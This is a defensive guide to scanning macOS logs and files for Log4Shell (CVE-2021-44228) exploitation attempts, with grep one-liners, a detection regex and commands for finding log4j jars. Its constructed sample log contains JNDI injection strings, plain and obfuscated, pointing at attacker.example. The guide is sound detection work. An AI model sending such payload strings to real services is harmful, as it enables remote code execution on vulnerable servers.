You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228 (Log4Shell) on macOS using zsh.
Based on https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all its subfolders.
LC_ALL=C overrides your user locale so that sed, tr and grep process the logs as raw bytes: under a UTF-8 locale the macOS (BSD) tools abort with "Illegal byte sequence" on lines that are not valid UTF-8, which log files often contain (more about it here).
sudo find /var/log/ -type f -exec sh -c 'LC_ALL=C sed -e "s/\${lower://g" "$1" | LC_ALL=C tr -d "}" | LC_ALL=C grep -E -I -i "jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):" | sed "s|^|$1: |"' sh {} \;
The sed/tr pair undoes the ${lower:j}ndi style of obfuscation before grep looks for the JNDI protocol prefixes; the trailing sed prefixes each hit with the file it came from. The file name is handed to sh as an argument ($1) instead of being spliced into the command string, so a crafted file name under /var/log cannot inject commands into the root shell that find spawns.
This command does the same for compressed files (*.gz) in the folder /var/log and all its subfolders, using gzcat (on macOS, zcat expects .Z files, not .gz):
sudo find /var/log/ -type f -name '*.gz' -exec sh -c 'gzcat "$1" | LC_ALL=C sed -e "s/\${lower://g" | LC_ALL=C tr -d "}" | LC_ALL=C grep -E -i "jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):" | sed "s|^|$1: |"' sh {} \;
If either command prints matches, something on this machine logged a Log4Shell exploitation attempt. A match does not prove the exploit succeeded (the log line may come from an internet-wide scan against a service that never passed it to log4j), but treat it as an incident: jump directly to the mitigation strategies, or contact someone who can help you.
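The normalise-then-grep logic of the two commands above, packaged as a shell function and run over a few constructed Apache-style access-log lines. This is an added example, not code from the original gist or from Neo23x0's detector; the log lines, IP addresses and attacker.example hostnames are made up. Beyond what the one-liners do, it also strips the ${upper:...}, ${::-...} and ${env:NAME:-...} lookups that attackers use to hide "jndi" and the protocol name, so the heavily obfuscated second line is still caught.

```sh
#!/bin/sh
# Added example, not code from the original gist or from Neo23x0's detector.
# Reads log lines on stdin, undoes common Log4j lookup obfuscation, and prints
# only the lines that reference a JNDI lookup. Exit status 0 = something found,
# 1 = nothing found (grep's own status), which is what you would alert on.
scan_log4shell() {
    # LC_ALL=C keeps BSD sed/tr/grep from aborting on bytes that are not valid
    # UTF-8 ("Illegal byte sequence" under a UTF-8 locale).
    LC_ALL=C sed \
        -e 's/\${lower://g' \
        -e 's/\${upper://g' \
        -e 's/\${::-//g' \
        -e 's/\${env:[^:}]*:-//g' \
    | LC_ALL=C tr -d '}' \
    | LC_ALL=C grep -E -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'
    # ${lower:j} -> j}, ${upper:n} -> n}, ${::-d} -> d}, ${env:NOPE:-i} -> i};
    # tr then drops the leftover braces, leaving a plain "jndi:ldap://..." to grep for.
}

# Constructed sample (not a real capture): one plain attempt, one attempt
# obfuscated with four different lookup tricks, and one benign request.
SAMPLE_LOG='10.0.0.1 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.2 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://attacker.example/b}"
10.0.0.3 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Number of suspicious lines in the sample, so the result can be checked.
count_suspicious() {
    printf '%s\n' "$SAMPLE_LOG" | scan_log4shell | wc -l | tr -d ' '
}

# Stand-alone run: prints the two attack lines, then the count.
# On a real machine feed it the logs instead: sudo cat /var/log/*.log | scan_log4shell
printf '%s\n' "$SAMPLE_LOG" | scan_log4shell
echo "suspicious lines: $(count_suspicious)"
```

The function still only normalises the lookups it knows about; the back2root regex and the Python scanner linked below cover further encodings (URL-encoding, Unicode escapes, base64 payloads).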
A massive regex to cover even the most obfuscated variants: https://github.com/back2root/log4shell-rex. If the previous commands don't return any matches, you may want to try out this regex, just in case.
(?:\$|%(?:25)*24|\\(?:0024|0{0,2}44))(?:{|%(?:25)*7[Bb]|\\(?:007[Bb]|0{0,2}173)).{0,30}?((?:[Jj]|%(?:25)*[46][Aa]|\\(?:00[46][Aa]|0{0,2}1[15]2)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?((?:[Ll]|%(?:25)*[46][Cc]|\\(?:00[46][Cc]|0{0,2}1[15]4)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?|(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Mm]|%(?:25)*[46][Dd]|\\(?:00[46][Dd]|0{0,2}1[15]5)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)|(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:.{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)){2}.{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))|(?:[Cc]|%(?:25)*[46]3|\\(?:00[46]3|0{0,2}1[04]3)).{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Hh]|%(?:25)*[46]8|\\(?:00[46]8|0{0,2}1[15]0))(?:.{0,30}?(?:[Tt]|%(?:25)*[57]4|\\(?:00[57]4|0{0,2}1[26]4))){2}.{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?(?:\/|%(?:25)*2[Ff]|\\(?:002[Ff]|0{0,2}57)|\${)|(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)).{0,30}?(?:[Ee]|%(?:25)*[46]5|\\(?:00[46]5|0{0,2}1[04]5)).{2,60}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))
To use this regex on macOS, make sure you have installed GNU grep: the BSD grep that ships with macOS does not support the -P (Perl-compatible regex) option this pattern needs. If you don't have it, you can install it with brew:
brew install grep
Installed that way, brew does not replace the system grep; it adds a ggrep command (the GNU one), so both coexist and the behavior of your existing scripts is not affected.
Now you can execute, for example (keep the regex in single quotes, since it contains $ and backslashes that a double-quoted shell string would mangle):
sudo find /var/log -type f -name "*.log" -exec ggrep -P -H 'REGEX-FROM-HELL-GOES-HERE' {} +
Using -exec instead of piping into xargs keeps file names with spaces intact and runs ggrep under the same sudo as find; -H prints the file name in front of each match.
A Python-based scanner that detects the most obfuscated forms of the exploit strings. Again, if the first two commands don't return any results, you can also try this one:
https://github.com/Neo23x0/log4shell-detector
Look for log4j files (and running processes using them) on your Mac with these commands:
ps aux | grep -E '[l]og4j'
sudo find / -iname "log4j*"
sudo lsof | grep -i log4j
sudo grep -r --include '*.[wj]ar' "JndiLookup.class" / 2>&1 | grep matches
The [l]og4j bracket trick keeps grep from matching its own command line in the ps output. The last command relies on zip entry names being stored uncompressed inside .jar/.war files, so it finds log4j-core jars that sit directly on disk; a log4j-core jar nested inside a fat jar or war is usually stored compressed and will not be found this way, so unpack those and check them separately.
For many of the locations found, you can most probably just delete the log4j files, because they live in a cache folder (/.../.gradle/caches/... for instance), in the trash, or among a project's downloaded dependencies (like /.../.m2/repository/log4j) that you can download again, making sure you upgrade to the latest patched version. If you are not sure, ask for help.
If running some of these commands you get 'Operation not permitted' messages, it's probably fine.
macOS 10.11 (El Capitan) and later ship with System Integrity Protection (SIP), which protects certain directories precisely to prevent the OS from being compromised by malicious code, even code running as root.
So if you get 'Operation not permitted' outputs in one of these folders, that's actually good:
/System
/sbin
/bin
/usr (with the exception of /usr/local subdirectory)
/Applications for apps that are preinstalled with macOS (Terminal, Safari, etc.)
If you get the message for other directories, it could be because Terminal doesn't have Full Disk Access.
You can grant it under System Preferences > Security & Privacy > Privacy > Full Disk Access, restart Terminal and run the script again. You can revoke it afterwards.
Detailed step-by-step instructions here.
Note: if you are using iTerm2, grant Full Disk Access to iTerm2 itself. It is a separate application, not a wrapper around Terminal, and macOS grants this permission per application.
You may also get 'No such file or directory' inside /System/Volumes/.
Don't worry about those; they're probably entries listed as volumes that are not actually mounted.
If none of the previous steps show any issue, you are good to go :)
YARA is a pattern-matching tool for identifying malware; it works from rules stored in .yar files, like this one for the log4j vulnerability. Apart from YARA itself, other scanners embed the YARA engine, and usually just placing the rule file in a specific folder lets the scanner detect that specific malware. If you use a scanner like that in your projects, you can use that file. Of course, if you want to try YARA directly, you can download the latest release from here.
I'm merely compiling findings and tips provided by Jonathan Fernández (Thoughtworks Spain Infosec Lead).
Thank you!